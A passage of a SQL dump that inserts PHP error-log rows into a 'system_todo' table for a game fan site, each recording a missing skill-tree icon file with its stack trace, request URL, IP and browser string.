'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 131, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (531, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_invisibilty.png\' found.', 'e48e91573e6869a7c4a66a1410d4fad18cfbd0b0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_in...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_in...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.04, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_nature_invisibilty.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 137, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (532, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_spear_02.png\' found.', 'e36f87324eb0e049a6507110340a074188d69559', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_spear_02.pn...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_spear_02.pn...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:35:28', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_spear_02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 25, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (533, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_feigndead.png\' found.', '436d9566983cbcf91287caabc18a3583c6f482b0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_feignde...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_feignde...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 23:12:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_feigndead.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (534, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_fiegndead.png\' found.', 'e641b6e85b21e6d3de26f1c369ed7f8a2261603a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_fiegnde...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_fiegnde...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_fiegndead.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 149, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (535, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_druid_disembowel.png\' found.', 'ec80d7192292891b7c27b31755ef0621fec50563', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_druid_d...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_druid_d...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_druid_disembowel.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 145, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (536, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_sliceanddice.png\' found.', 'ea40433a83dcc7f54a268259bf6ffd55a9eaa955', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_s...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_s...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-13 23:13:40', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_sliceanddice.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (538, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_criticalstrike.png\' found.', '5e8894f2ab07948ce01160344c3282aa075dc518', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_critica...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_critica...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_criticalstrike.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 131, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (539, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_poisons.png\' found.', 'ae73a7785edc7fc5088a2560e3ae40cf50051db9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_poisons...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_poisons...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_poisons.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 126, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (540, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_ice_lament.png\' found.', '9de5c30ceccde5613878a0f849f8b79ea6955762', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_ice_lamen...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_ice_lamen...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_ice_lament.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 127, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (541, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_rogue_kidneyshot.png\' found.', '9a297e230466fa3ebbbbe52b3269c53c424ddc25', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_rogue_k...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_rogue_k...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_rogue_kidneyshot.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 122, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (542, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_chilltouch.png\' found.', '17610983b2c14e49df505a873502009b1f94a062', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ch...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ch...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_chilltouch.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 153, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (543, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_nature_earthbindtotem.png\' found.', '2971253ed82328f54f846ada411ab4e2a0b18e13', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_nature_ea...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_nature_ea...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:37:20', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_nature_earthbindtotem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 196, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (544, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_ritualofsacrifice.png\' found.', 'c6746884642b13e3f7999dc25cf598ee90f2ac48', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ri...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ri...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_ritualofsacrifice.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 116, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (545, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_marksmanship.png\' found.', '911e09e7652880e45734e33942675be98d56658d', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_marksma...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_marksma...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.028, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=ability_marksmanship.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 108, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (546, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowward.png\' found.', 'f1bb9b2ae358394b14c0ae333a340afdac79487e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_shadowward.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 154, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (547, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'abilit_rogue_sprint.png\' found.', 'cc5c7d9ebf17b1d484210c420c05e5c4592a37d7', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'abilit_rogue_sp...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'abilit_rogue_sp...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-13 23:19:50', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=abilit_rogue_sprint.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (548, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_weapon_shortblade_05.png\' found.', 'f7f9fbcfa8ee0832e650a10fb3568703fd876069', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_weapon_shor...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_weapon_shor...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=inv_weapon_shortblade_05.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 96, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (549, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_warrior_punishingblow.png\' found.', '126344bcf431b8e29213e22fea09ecd8de242bf3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_warrior...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_warrior...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_warrior_punishingblow.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 80, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (550, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_gauntlets_04.png\' found.', 'e83af102b5505eb9b927ef55610b3fea028a73c9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_gauntlets_0...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_gauntlets_0...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:48:05', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_gauntlets_04.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 76, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (551, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowworddominate.png\' found.', 'd91c2800106bf3c8d308ee4e848765fe10298cf0', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.004, '2014-12-14 03:44:39', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_shadowworddominate.png', 'a:0:{}', 